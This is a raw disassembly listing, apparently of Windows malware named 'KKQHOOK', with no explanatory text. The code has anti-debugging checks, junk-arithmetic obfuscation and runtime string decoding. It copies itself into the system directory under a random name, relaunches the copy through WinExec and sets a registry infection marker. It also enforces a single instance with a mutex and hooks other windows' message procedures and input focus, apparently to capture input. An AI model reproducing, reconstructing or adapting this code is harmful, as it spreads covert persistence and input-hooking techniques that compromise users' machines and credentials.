cmp byte ptr [ecx+eax], 0
jnz short loc_40A7A3
push 0 ; lpOverlapped
lea esi, [ebp+NumberOfBytesWritten]
push esi ; lpNumberOfBytesWritten
push eax ; nNumberOfBytesToWrite
lea edi, [ebp-55E7h]
push edi ; lpBuffer
push [ebp+hFile] ; hFile
call WriteFile ; WriteFile
mov [ebp+var_55F8], 0FBh
mov eax, 2DF3h
mul [ebp+var_55F8]
mov [ebp+var_5610], eax
mov eax, [ebp+var_5610]
mov [ebp+var_55F8], eax
mov eax, [ebp+var_45E4]
mov [ebp+var_5614], eax
lea ecx, [ebp+eax+Format]
or eax, 0FFFFFFFFh
loc_40A803: ; CODE XREF: sub_4098A8+F60�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40A803
mov esi, [ebp+var_5614]
add esi, eax
mov [ebp+var_45E4], esi
mov [ebp+var_55F9], 17h
add [ebp+var_55F9], 0FAh
inc [ebp+var_45E4]
mov eax, [ebp+var_45E0]
cmp [ebp+var_45E4], eax
jb loc_40A762
mov [ebp+var_55FA], 0B8h
sub [ebp+var_55FA], 50h
push [ebp+hFile] ; hObject
call CloseHandle ; CloseHandle
mov [ebp+var_5600], 5720h
inc [ebp+var_5600]
loc_40A867: ; CODE XREF: sub_4098A8+395�j
; sub_4098A8+3AE�j ...
lea eax, [ebp+Dst]
push eax ; Dst
push [ebp+var_708] ; int
push [ebp+hMem] ; int
call sub_401BB7
add esp, 0Ch
mov [ebp+var_708], eax
or eax, eax
jnz loc_409C42
push [ebp+hMem] ; hMem
call LocalFree ; LocalFree
call GetVersion ; GetVersion
loc_40A8A0: ; CODE XREF: sub_4098A8+2FB�j
; sub_4098A8+35B�j ...
call sub_408B4C
call GetLastError
fld dbl_446C44
fimul dword_43C0BC
mov edi, eax
call sub_40C630
xchg eax, edi
push edi ; X
call abs ; abs
mov edi, dword_43C0C0
sub edi, eax
inc edi
mov [ebp+var_1014], edi
mov eax, dword_446A33
mov [ebp+var_1162], eax
mov eax, edi
mov [ebp-15C8h], eax
push eax ; X
call abs ; abs
add esp, 8
mov edi, [ebp-15C8h]
add edi, eax
mov [ebp+var_1014], edi
call IsDebuggerPresent ; IsDebuggerPresent
mov eax, edi
mov edi, dword_43C0C0
sub edi, dword_43C0BC
mov ecx, edi
inc ecx
xor edx, edx
div ecx
mov [ebp+var_15CC], eax
mov [ebp+var_1014], eax
call IsDebuggerPresent ; IsDebuggerPresent
call rand ; rand
mov [ebp+var_15D0], eax
mov eax, dword_43C0BC
mov edx, 66666667h
push ecx
mov ecx, eax
imul edx
sar edx, 1
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
lea edi, [eax+eax*4]
mov esi, [ebp+var_1014]
mov edx, [ebp+var_15D0]
mov eax, esi
imul eax, [ebp+var_15D0]
mov ecx, 0Ah
cdq
idiv ecx
lea edi, [edi+edx+5]
mov dword_43C0BC, edi
call GetTickCount ; GetTickCount
mov eax, dword_43C0C0
cmp dword_43C0BC, eax
jbe short loc_40A98F
and dword_43C0BC, 0
loc_40A98F: ; CODE XREF: sub_4098A8+10DE�j
lea edi, [ebp+var_1163]
lea esi, byte_446A37
xor ecx, ecx
inc ecx
rep movsb
push 30D40h ; Duration
call _sleep ; _sleep
pop ecx
call GetLastError
jmp loc_40993B
sub_4098A8 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9BC proc near ; CODE XREF: sub_40AA24+11�p
var_C = dword ptr -0Ch
hObject = dword ptr -8
var_2 = word ptr -2
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
call GetVersion ; GetVersion
mov [ebp+var_2], 7C9Bh
movzx eax, [ebp+var_2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2], ax
push offset Name ; "KKQHOOK_29"
push 0 ; bInheritHandle
push 1F0001h ; dwDesiredAccess
call OpenMutexA ; OpenMutexA
mov [ebp+hObject], eax
or eax, eax
jz short loc_40AA21
call GetLastError
push [ebp+hObject] ; hObject
call CloseHandle ; CloseHandle
mov [ebp+var_C], 7B70h
sub [ebp+var_C], 2C79h
mov eax, 13h
sub eax, dword_43C098
push eax ; Code
call exit ; exit
; ---------------------------------------------------------------------------
pop ecx
loc_40AA21: ; CODE XREF: sub_40A9BC+36�j
pop edi
leave
retn
sub_40A9BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_40AA24(HMODULE hModule, int, int, int)
sub_40AA24 proc near ; CODE XREF: sub_40C654+5C�p
var_7CF = byte ptr -7CFh
var_7C8 = dword ptr -7C8h
var_7C3 = byte ptr -7C3h
var_7C1 = byte ptr -7C1h
var_7C0 = dword ptr -7C0h
var_7BC = dword ptr -7BCh
var_7B8 = dword ptr -7B8h
ThreadId = dword ptr -7B4h
var_7AF = byte ptr -7AFh
var_7AC = word ptr -7ACh
var_7AA = byte ptr -7AAh
var_7A2 = byte ptr -7A2h
var_79F = byte ptr -79Fh
var_797 = word ptr -797h
var_795 = byte ptr -795h
var_792 = byte ptr -792h
var_78C = byte ptr -78Ch
Type = dword ptr -784h
var_780 = dword ptr -780h
var_77C = word ptr -77Ch
SubKey = byte ptr -77Ah
var_67B = byte ptr -67Bh
Filename = byte ptr -57Ch
var_478 = dword ptr -478h
cbData = dword ptr -474h
ExistingFileName= byte ptr -470h
hObject = dword ptr -36Ch
var_367 = byte ptr -367h
var_366 = word ptr -366h
var_364 = dword ptr -364h
var_360 = dword ptr -360h
Format = byte ptr -35Bh
Dest = byte ptr -2F7h
var_293 = byte ptr -293h
var_292 = word ptr -292h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_286 = word ptr -286h
var_284 = dword ptr -284h
var_27E = word ptr -27Eh
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_272 = word ptr -272h
NewFileName = byte ptr -270h
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_167 = byte ptr -167h
var_166 = word ptr -166h
var_164 = word ptr -164h
FileName = byte ptr -161h
var_5D = byte ptr -5Dh
Data = byte ptr -5Ch
WndClass = WNDCLASSA ptr -55h
var_2D = byte ptr -2Dh
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_25 = byte ptr -25h
Msg = MSG ptr -1Dh
var_1 = byte ptr -1
hModule = dword ptr 8
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push edi
call GetLastError
call sub_40A9BC
call GetCurrentProcessId ; GetCurrentProcessId
mov ax, word_446A38
mov [ebp+var_77C], ax
push 104h ; uSize
lea eax, [ebp+FileName]
push eax ; lpBuffer
call GetSystemDirectoryA ; GetSystemDirectoryA
mov [ebp+var_164], 7225h
sub [ebp+var_164], 4952h
push 13h ; Size
push offset byte_446C2F ; Src
call sub_40129C
push eax ; Source
lea edi, [ebp+FileName]
push edi ; Dest
call strcat ; strcat
add esp, 10h
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 80000001h ; dwDesiredAccess
lea eax, [ebp+FileName]
push eax ; lpFileName
call CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp eax, 0FFFFFFFFh
jnz short loc_40AAB8
call sub_40844F
jmp short loc_40AAC3
; ---------------------------------------------------------------------------
loc_40AAB8: ; CODE XREF: sub_40AA24+8B�j
push [ebp+hObject] ; hObject
call CloseHandle ; CloseHandle
loc_40AAC3: ; CODE XREF: sub_40AA24+92�j
call GetLastError
push 9 ; Size
push offset byte_446C25 ; Src
call sub_40129C
push eax ; lpString
call GlobalAddAtomA ; GlobalAddAtomA
call GetVersion ; GetVersion
mov eax, [ebp+hModule]
mov hInstance, eax
mov VersionInformation.dwOSVersionInfoSize, 94h
call GetLastError
push offset VersionInformation ; lpVersionInformation
call GetVersionExA ; GetVersionExA
mov [ebp+var_166], 14B0h
movzx eax, [ebp+var_166]
imul eax, 2D29h
mov [ebp+var_166], ax
push 0FFh ; uSize
push offset Buffer ; lpBuffer
call GetSystemDirectoryA ; GetSystemDirectoryA
mov [ebp+var_167], 6Eh
movzx eax, [ebp+var_167]
imul eax, 5351h
mov [ebp+var_167], al
call GetTickCount ; GetTickCount
push eax ; Seed
call srand ; srand
mov [ebp+var_168], 59h
movzx eax, [ebp+var_168]
imul eax, 49B8h
mov [ebp+var_168], al
mov eax, dword_446A3A
mov [ebp+var_780], eax
push 104h ; nSize
lea eax, [ebp+ExistingFileName]
push eax ; lpFilename
push [ebp+hModule] ; hModule
call GetModuleFileNameA ; GetModuleFileNameA
call GetLastError
and dword ptr [ebp+Data], 0
mov [ebp+cbData], 4
mov [ebp+var_16C], 665Eh
mov eax, 6DB4h
mul [ebp+var_16C]
mov [ebp+var_7B8], eax
mov [ebp+var_16C], eax
lea eax, [ebp+Type]
push eax ; lpType
lea eax, [ebp+cbData]
push eax ; lpcbData
lea eax, [ebp+Data]
push eax ; lpData
push offset ClassName ; "KKQHOOK"
push offset SubKey ; "Software\\Microsoft\\Windows"
push 80000001h ; hKey
call sub_4014C9
add esp, 24h
mov [ebp+var_478], eax
mov [ebp+var_5D], 0FBh
movzx eax, [ebp+var_5D]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_5D], al
cmp [ebp+var_478], 0
jz short loc_40AC5D
lea edi, [ebp+var_7C1]
lea esi, word_446A3E
mov ecx, 5
rep movsb
cmp dword ptr [ebp+Data], 1Dh
jbe short loc_40AC32
mov eax, 6
sub eax, dword_43C094
push eax ; Code
call exit ; exit
; ---------------------------------------------------------------------------
pop ecx
loc_40AC32: ; CODE XREF: sub_40AA24+1FA�j
cmp dword ptr [ebp+Data], 1Dh
jz loc_40AE0C
mov [ebp+var_7BC], 6267h
mov eax, 5DE7h
mul [ebp+var_7BC]
mov [ebp+var_7C8], eax
mov [ebp+var_7BC], eax
loc_40AC5D: ; CODE XREF: sub_40AA24+1E1�j
lea edi, [ebp+var_78C]
lea esi, byte_446A43
movsd
movsd
lea edi, [ebp+var_792]
lea esi, aWq6ug ; "wq6Ug"
mov ecx, 3
rep movsw
call rand ; rand
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
add edi, 41h
mov edx, edi
mov [ebp+var_2D], dl
mov [ebp+var_272], 223Eh
movzx eax, [ebp+var_272]
imul eax, 298Dh
mov [ebp+var_272], ax
mov [ebp+var_1], 1
jmp short loc_40ACF3
; ---------------------------------------------------------------------------
loc_40ACC6: ; CODE XREF: sub_40AA24+2D4�j
call rand ; rand
movzx edi, [ebp+var_1]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov esi, eax
add esi, 61h
mov edx, esi
mov [ebp+edi+var_2D], dl
add [ebp+var_1], 1
loc_40ACF3: ; CODE XREF: sub_40AA24+2A0�j
mov al, [ebp+var_1]
cmp al, 8
jbe short loc_40ACC6
call GetCurrentProcessId ; GetCurrentProcessId
mov [ebp+var_25], 0
call rand ; rand
mov edx, eax
test dl, 1
jnz short loc_40AD21
call GetLastError
mov [ebp+var_27], 33h
call GetCurrentProcessId ; GetCurrentProcessId
mov [ebp+var_26], 32h
loc_40AD21: ; CODE XREF: sub_40AA24+2E9�j
push 9 ; Size
push offset byte_446C1B ; Src
call sub_40129C
lea edi, [ebp+var_2D]
push edi
push offset Buffer
push eax ; Format
lea edi, [ebp+NewFileName]
push edi ; Dest
call sprintf ; sprintf
lea edi, [ebp+var_795]
lea esi, aRf ; "rf"
mov ecx, 3
rep movsb
push 0 ; bFailIfExists
lea eax, [ebp+NewFileName]
push eax ; lpNewFileName
lea eax, [ebp+ExistingFileName]
push eax ; lpExistingFileName
call CopyFileA ; CopyFileA
mov [ebp+var_278], 1F00h
add [ebp+var_278], 2126h
lea eax, [ebp+var_2D]
push eax
call sub_403BE7
mov ax, word_446A54
mov [ebp+var_797], ax
mov dword ptr [ebp+Data], 1Dh
push 4 ; dwType
push 4 ; cbData
lea eax, [ebp+Data]
push eax ; lpData
push offset ClassName ; "KKQHOOK"
push offset SubKey ; "Software\\Microsoft\\Windows"
push 80000001h ; hKey
call sub_40160A
add esp, 34h
push 0 ; uCmdShow
lea eax, [ebp+NewFileName]
push eax ; lpCmdLine
call WinExec ; WinExec
mov ebx, 5146h
mov eax, 3A35h
mul ebx
mov [ebp+var_7BC], eax
mov ebx, eax
call sub_40406B
mov [ebp+var_27C], 7EF6h
add [ebp+var_27C], 2A96h
mov eax, 13h
sub eax, dword_43C098
push eax ; uExitCode
call ExitProcess ; ExitProcess
; ---------------------------------------------------------------------------
call GetLastError
loc_40AE0C: ; CODE XREF: sub_40AA24+212�j
push 5 ; Size
push offset byte_446C15 ; Src
call sub_40129C
push offset byte_446C0B
push offset Buffer
push eax ; Format
push offset byte_41FA00 ; Dest
call sprintf ; sprintf
call GetCurrentThreadId ; GetCurrentThreadId
push 5 ; Size
push offset byte_446C15 ; Src
call sub_40129C
push offset byte_446C01
push offset Buffer
push eax ; Format
push offset FileName ; Dest
call sprintf ; sprintf
call GetCurrentThreadId ; GetCurrentThreadId
push 5 ; Size
push offset byte_446C15 ; Src
call sub_40129C
push offset dword_446BF4
push offset Buffer
push eax ; Format
push offset byte_40E080 ; Dest
call sprintf ; sprintf
mov [ebp+var_27E], 3039h
inc [ebp+var_27E]
push 0Eh ; Size
push offset byte_446BE5 ; Src
call sub_40129C
push offset Buffer
push eax ; Format
push offset ExistingFileName ; Dest
call sprintf ; sprintf
push 0FFh ; uSize
push offset byte_415080 ; lpBuffer
call GetWindowsDirectoryA ; GetWindowsDirectoryA
mov [ebp+var_284], 5F78h
mov eax, 6104h
mul [ebp+var_284]
mov [ebp+var_7C0], eax
mov [ebp+var_284], eax
push 9 ; Size
push offset byte_446BDB ; Src
call sub_40129C
push eax ; Source
push offset byte_415080 ; Dest
call strcat ; strcat
mov [ebp+var_286], 8EFh
sub [ebp+var_286], 6AEAh
lea eax, ClassName ; "KKQHOOK"
mov [ebp+WndClass.lpszClassName], eax
call IsDebuggerPresent ; IsDebuggerPresent
mov eax, hInstance
mov [ebp+WndClass.hInstance], eax
lea eax, sub_40B3E8
mov [ebp+WndClass.lpfnWndProc], eax
push 7F00h ; lpCursorName
push 0 ; hInstance
call LoadCursorA ; LoadCursorA
mov [ebp+WndClass.hCursor], eax
mov [ebp+var_28C], 5A0Bh
inc [ebp+var_28C]
push 7F03h ; lpIconName
push 0 ; hInstance
call LoadIconA ; LoadIconA
mov [ebp+WndClass.hIcon], eax
call GetTickCount ; GetTickCount
and [ebp+WndClass.lpszMenuName], 0
push 0 ; i
call GetStockObject ; GetStockObject
mov [ebp+WndClass.hbrBackground], eax
lea edi, [ebp+var_79F]
lea esi, word_446A56
movsd
movsd
mov [ebp+WndClass.style], 3
and [ebp+WndClass.cbClsExtra], 0
and [ebp+WndClass.cbWndExtra], 0
lea eax, [ebp+WndClass]
push eax ; lpWndClass
call RegisterClassA ; RegisterClassA
mov [ebp+var_290], 4E7Bh
sub [ebp+var_290], 7B38h
push 0 ; lpParam
push hInstance ; hInstance
push 0 ; hMenu
push 0 ; hWndParent
push 0 ; nHeight
push 0 ; nWidth
push 0 ; Y
push 0 ; X
push 0CA0000h ; dwStyle
push offset ClassName ; "KKQHOOK"
push offset ClassName ; "KKQHOOK"
push 0 ; dwExStyle
call CreateWindowExA ; CreateWindowExA
mov dword_41C7BC, eax
push offset Name ; "KKQHOOK_29"
push 0 ; bInitialOwner
push 0 ; lpMutexAttributes
call CreateMutexA ; CreateMutexA
call GetVersion ; GetVersion
push 2
call sub_402A48
add esp, 70h
call GetLastError
call GetVersion ; GetVersion
cmp eax, 80000000h
jb short loc_40B05B
mov eax, dword_446A5E
mov [ebp+var_7C8], eax
push 0Ch ; Size
push offset word_446BCE ; Src
call sub_40129C
push eax ; lpModuleName
call GetModuleHandleA ; GetModuleHandleA
mov edi, eax
push 16h ; Size
push offset aJZaJzJvDjZz ; "†±³½§ ±¦‡±¦¢½·±„¦»·±§§"
call sub_40129C
add esp, 10h
push eax ; lpProcName
push edi ; hModule
call GetProcAddress ; GetProcAddress
mov [ebp-7C4h], eax
call GetCurrentProcessId ; GetCurrentProcessId
mov edi, 13h
sub edi, dword_43C098
push edi
push eax
call dword ptr [ebp-7C4h]
lea edi, [ebp+var_7CF]
lea esi, word_446A62
mov ecx, 7
rep movsb
loc_40B05B: ; CODE XREF: sub_40AA24+5CF�j
push 104h ; nSize
lea eax, [ebp+Filename]
push eax ; lpFilename
push 0 ; hModule
call GetModuleFileNameA ; GetModuleFileNameA
mov [ebp+var_292], 1A3Fh
inc [ebp+var_292]
lea eax, [ebp+Filename]
push eax
call sub_40341E
push offset byte_41FA00
call sub_40341E
push offset FileName
call sub_40341E
call GetTickCount ; GetTickCount
push offset byte_40E080
call sub_40341E
call GetTickCount ; GetTickCount
call GetCurrentProcessId ; GetCurrentProcessId
push eax ; Val
call sub_4036BC
mov [ebp+var_293], 0A0h
sub [ebp+var_293], 3Ch
lea edi, [ebp+var_7A2]
lea esi, byte_446A69
mov ecx, 3
rep movsb
lea eax, [ebp+Dest]
push eax ; Dest
call sub_40399B
call GetCurrentProcessId ; GetCurrentProcessId
and [ebp+var_360], 0
mov [ebp+var_364], 64h
push 45h ; Size
push offset aZAgJIsJZAigGzi ; "‡»² £µ¦±ˆ™½·¦»§»² ˆƒ½º°»£§ˆ—¡¦¦±º ‚±¦§½"...
call sub_40129C
lea edi, [ebp+var_360]
push edi ; lpType
lea edi, [ebp+var_364]
push edi ; lpcbData
lea edi, [ebp+Format]
push edi ; lpData
lea edi, [ebp+Dest]
push edi ; lpValueName
push eax ; lpSubKey
push 80000002h ; hKey
call sub_4014C9
call GetLastError
push 1 ; Size
push offset byte_446B6F ; Src
call sub_40129C
push eax ; Source
lea edi, [ebp+Format]
push edi ; Format
call sub_4037CA
lea edi, [ebp+var_7AA]
lea esi, dword_446A6C
movsd
movsd
push 1 ; Size
push offset byte_446B6D ; Src
call sub_40129C
push eax ; Source
lea edi, [ebp+Dest]
push edi ; Format
call sub_4037CA
call GetTickCount ; GetTickCount
mov ax, word_446A74
mov [ebp+var_7AC], ax
push 17h ; Size
push offset byte_446B55 ; Src
call sub_40129C
lea edi, [ebp+Format]
push edi
push eax ; Format
lea edi, [ebp+SubKey]
push edi ; Dest
call sprintf ; sprintf
lea edi, [ebp+var_7AF]
lea esi, word_446A76
mov ecx, 3
rep movsb
lea eax, [ebp+var_360]
push eax ; lpType
lea eax, [ebp+var_364]
push eax ; lpcbData
lea eax, [ebp+var_67B]
push eax ; lpData
push 0 ; lpValueName
lea eax, [ebp+SubKey]
push eax ; lpSubKey
push 80000000h ; hKey
call sub_4014C9
lea eax, [ebp+var_67B]
push eax
call sub_40341E
call IsDebuggerPresent ; IsDebuggerPresent
call sub_403A5F
mov [ebp+var_366], 6996h
movzx eax, [ebp+var_366]
imul eax, 6E78h
mov [ebp+var_366], ax
push offset sub_408048
call sub_407F07
add esp, 8Ch
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
push 0 ; lpParameter
push offset sub_4098A8 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call CreateThread ; CreateThread
push eax ; hObject
call CloseHandle ; CloseHandle
call GetCurrentThreadId ; GetCurrentThreadId
push 0 ; lpTimerFunc
mov eax, dword_43C094
add eax, 1EFh
push eax ; uElapse
mov eax, 13h
sub eax, dword_43C098
push eax ; nIDEvent
push dword_41C7BC ; hWnd
call SetTimer ; SetTimer
mov [ebp+var_367], 0ADh
add [ebp+var_367], 1
jmp short loc_40B2B0
; ---------------------------------------------------------------------------
loc_40B280: ; CODE XREF: sub_40AA24+89D�j
lea edi, [ebp+var_7C3]
lea esi, byte_446A79
mov ecx, 3
rep movsb
lea eax, [ebp+Msg]
push eax ; lpMsg
call TranslateMessage ; TranslateMessage
mov eax, dword_446A7C
mov [ebp+var_7C8+1], eax
lea eax, [ebp+Msg]
push eax ; lpMsg
call DispatchMessageA ; DispatchMessageA
loc_40B2B0: ; CODE XREF: sub_40AA24+85A�j
push 0 ; wMsgFilterMax
push 0 ; wMsgFilterMin
push 0 ; hWnd
lea eax, [ebp+Msg]
push eax ; lpMsg
call GetMessageA ; GetMessageA
or eax, eax
jnz short loc_40B280
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40AA24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_40B2CA(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
sub_40B2CA proc near ; DATA XREF: sub_408ED0+917�o
; sub_408ED0+94F�o ...
var_14 = dword ptr -14h
var_C = byte ptr -0Ch
var_7 = byte ptr -7
var_6 = word ptr -6
lpPrevWndFunc = dword ptr -4
hWnd = dword ptr 8
Msg = dword ptr 0Ch
wParam = dword ptr 10h
lParam = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov ebx, [ebp+hWnd]
call GetCurrentProcessId ; GetCurrentProcessId
mov eax, [ebp+Msg]
cmp eax, 100h
jz short loc_40B2EC
jmp short loc_40B35A
; ---------------------------------------------------------------------------
call GetVersion ; GetVersion
loc_40B2EC: ; CODE XREF: sub_40B2CA+19�j
call GetProcessHeap ; GetProcessHeap
cmp [ebp+wParam], 9
jnz short loc_40B35A
mov eax, dword_446A80
mov [ebp+var_14], eax
cmp ebx, dword_41081C
jnz short loc_40B312
push dword_432DC0 ; hWnd
call SetFocus ; SetFocus
loc_40B312: ; CODE XREF: sub_40B2CA+3B�j
call GetVersion ; GetVersion
cmp ebx, dword_432DC0
jnz short loc_40B32A
push dword_41E8C4 ; hWnd
call SetFocus ; SetFocus
loc_40B32A: ; CODE XREF: sub_40B2CA+53�j
call GetCurrentProcessId ; GetCurrentProcessId
cmp ebx, dword_41E8C4
jnz short loc_40B342
push dword_41E8BC ; hWnd
call SetFocus ; SetFocus
loc_40B342: ; CODE XREF: sub_40B2CA+6B�j
cmp ebx, dword_41E8BC
jnz short loc_40B355
push dword_432DC0 ; hWnd
call SetFocus ; SetFocus
loc_40B355: ; CODE XREF: sub_40B2CA+7E�j
call GetProcessHeap ; GetProcessHeap
loc_40B35A: ; CODE XREF: sub_40B2CA+1B�j
; sub_40B2CA+2B�j
and [ebp+lpPrevWndFunc], 0
cmp ebx, dword_432DC0
jnz short loc_40B36E
mov eax, dword_41F9F4
mov [ebp+lpPrevWndFunc], eax
loc_40B36E: ; CODE XREF: sub_40B2CA+9A�j
cmp ebx, dword_41E8C4
jnz short loc_40B37E
mov eax, dword_41E8C0
mov [ebp+lpPrevWndFunc], eax
loc_40B37E: ; CODE XREF: sub_40B2CA+AA�j
mov [ebp+var_6], 5304h
sub [ebp+var_6], 7ADBh
cmp ebx, dword_41081C
jnz short loc_40B39A
mov eax, dword_40E078
mov [ebp+lpPrevWndFunc], eax
loc_40B39A: ; CODE XREF: sub_40B2CA+C6�j
call GetCurrentProcessId ; GetCurrentProcessId
cmp ebx, dword_41E8BC
jnz short loc_40B3AF
mov eax, dword_413F1C
mov [ebp+lpPrevWndFunc], eax
loc_40B3AF: ; CODE XREF: sub_40B2CA+DB�j
lea edi, [ebp+var_C]
lea esi, dword_446A84
mov ecx, 5
rep movsb
cmp [ebp+lpPrevWndFunc], 0
jz short loc_40B3D9
push [ebp+lParam] ; lParam
push [ebp+wParam] ; wParam
push [ebp+Msg] ; Msg
push ebx ; hWnd
push [ebp+lpPrevWndFunc] ; lpPrevWndFunc
call CallWindowProcA ; CallWindowProcA
jmp short loc_40B3E1
; ---------------------------------------------------------------------------
loc_40B3D9: ; CODE XREF: sub_40B2CA+F9�j
mov [ebp+var_7], 8Bh
add [ebp+var_7], 1
loc_40B3E1: ; CODE XREF: sub_40B2CA+10D�j
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40B2CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_40B3E8(int, UINT Msg, HDC wParam, LPARAM lParam)
sub_40B3E8 proc near ; DATA XREF: sub_40AA24+4F0�o
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
plbrush = LOGBRUSH ptr -254h
hWnd = dword ptr -240h
var_23C = dword ptr -23Ch
lpText = dword ptr -238h
NumberOfBytesWritten= dword ptr -234h
Buffer = byte ptr -22Fh
var_130 = byte ptr -130h
var_12B = byte ptr -12Bh
var_126 = word ptr -126h
var_124 = byte ptr -124h
var_121 = dword ptr -121h
var_11D = byte ptr -11Dh
var_11A = byte ptr -11Ah
var_114 = dword ptr -114h
hObject = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_102 = byte ptr -102h
var_101 = byte ptr -101h
String = byte ptr -100h
var_1 = byte ptr -1
arg_0 = dword ptr 8
Msg = dword ptr 0Ch
wParam = dword ptr 10h
lParam = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 264h
push ebx
push esi
push edi
mov [ebp+var_1], 0C7h
add [ebp+var_1], 1
mov eax, [ebp+Msg]
cmp eax, 10h
jz loc_40B5E9
jg short loc_40B418
cmp eax, 2
jz loc_40B5CE
jmp loc_40BC0A
; ---------------------------------------------------------------------------
loc_40B418: ; CODE XREF: sub_40B3E8+20�j
cmp eax, 111h
jz loc_40B709
cmp eax, 113h
jz short loc_40B453
cmp eax, 111h
jl loc_40BC0A
cmp eax, 138h
jz loc_40B605
jmp loc_40BC0A
; ---------------------------------------------------------------------------
mov [ebp+var_104], 0C5h
add [ebp+var_104], 26h
loc_40B453: ; CODE XREF: sub_40B3E8+40�j
mov [ebp+var_108], 4FC7h
inc [ebp+var_108]
cmp dword_43C220, 0
jz loc_40B57B
mov [ebp+lpText], 1930h
add [ebp+lpText], 3C79h
push 9 ; Size
push offset aRIA ; "»·›¶¾±· "
call sub_40129C
push eax ; int
push dword_43C220 ; hWnd
call sub_408E12
mov [ebp+var_23C], eax
call GetCurrentProcessId ; GetCurrentProcessId
push 8 ; Size
push offset aSmdJJ ; "‘¬¤¸»¦±¦"
call sub_40129C
push eax ; int
push [ebp+var_23C] ; hWnd
call sub_408E12
add esp, 20h
mov [ebp+hWnd], eax
lea eax, [ebp+plbrush.lbColor]
push eax ; lpRect
push [ebp+hWnd] ; hWnd
call GetWindowRect ; GetWindowRect
or eax, eax
jz loc_40B57B
call GetTickCount ; GetTickCount
lea eax, [ebp+var_260]
push eax ; lpRect
push hWndParent ; hWnd
call GetWindowRect ; GetWindowRect
or eax, eax
jz short loc_40B57B
call GetVersion ; GetVersion
mov eax, [ebp-248h]
sub eax, [ebp+plbrush.lbColor]
sub eax, 4
mov edx, [ebp+var_258]
sub edx, [ebp+var_260]
cmp eax, edx
jnz short loc_40B540
mov eax, [ebp-244h]
sub eax, [ebp+plbrush.lbHatch]
sub eax, 4
mov edx, [ebp+plbrush.lbStyle]
sub edx, [ebp+var_25C]
cmp eax, edx
jz short loc_40B57B
loc_40B540: ; CODE XREF: sub_40B3E8+137�j
call GetVersion ; GetVersion
push 1 ; bRepaint
mov eax, [ebp-244h]
sub eax, [ebp+plbrush.lbHatch]
push eax ; nHeight
mov eax, [ebp-248h]
sub eax, [ebp+plbrush.lbColor]
push eax ; nWidth
push 0 ; Y
push 0 ; X
push hWndParent ; hWnd
call MoveWindow ; MoveWindow
mov eax, off_446A89
mov [ebp+var_264], eax
loc_40B57B: ; CODE XREF: sub_40B3E8+82�j
; sub_40B3E8+F4�j ...
cmp dword_43C21C, 0
jz loc_40BC22
mov [ebp+lpText], 5CFDh
mov eax, [ebp+lpText]
mov edx, eax
add edx, eax
mov [ebp+lpText], edx
mov eax, dword_43C21C
mov dword_43C220, eax
call GetTickCount ; GetTickCount
and dword_43C21C, 0
push dword_43C220 ; hWnd
call sub_408ED0
pop ecx
call GetProcessHeap ; GetProcessHeap
jmp loc_40BC22
; ---------------------------------------------------------------------------
loc_40B5CE: ; CODE XREF: sub_40B3E8+25�j
mov eax, dword_41C7BC
cmp [ebp+arg_0], eax
jnz short loc_40B5DF
push 0 ; nExitCode
call PostQuitMessage ; PostQuitMessage
loc_40B5DF: ; CODE XREF: sub_40B3E8+1EE�j
call GetProcessHeap ; GetProcessHeap
jmp loc_40BC22
; ---------------------------------------------------------------------------
loc_40B5E9: ; CODE XREF: sub_40B3E8+1A�j
mov eax, dword_41C7BC
cmp [ebp+arg_0], eax
jnz short loc_40B5FB
push [ebp+arg_0] ; hWnd
call DestroyWindow ; DestroyWindow
loc_40B5FB: ; CODE XREF: sub_40B3E8+209�j
call GetLastError
jmp loc_40BC22
; ---------------------------------------------------------------------------
loc_40B605: ; CODE XREF: sub_40B3E8+52�j
mov eax, [ebp+lParam]
mov [ebp+var_114], eax
cmp eax, dword_432DB8
jz short loc_40B642
cmp eax, dword_413F20
jz short loc_40B642
cmp eax, dword_41B7A8
jz short loc_40B642
cmp eax, dword_4351D8
jz short loc_40B642
cmp eax, dword_432DBC
jz short loc_40B642
cmp eax, dword_43A558
jnz loc_40BC22
loc_40B642: ; CODE XREF: sub_40B3E8+22C�j
; sub_40B3E8+234�j ...
mov word ptr [ebp+lpText+2], 75BDh
movzx eax, word ptr [ebp+lpText+2]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+lpText+2], ax
mov eax, [ebp+var_114]
cmp eax, dword_432DBC
jz short loc_40B675
cmp eax, dword_43A558
jnz short loc_40B684
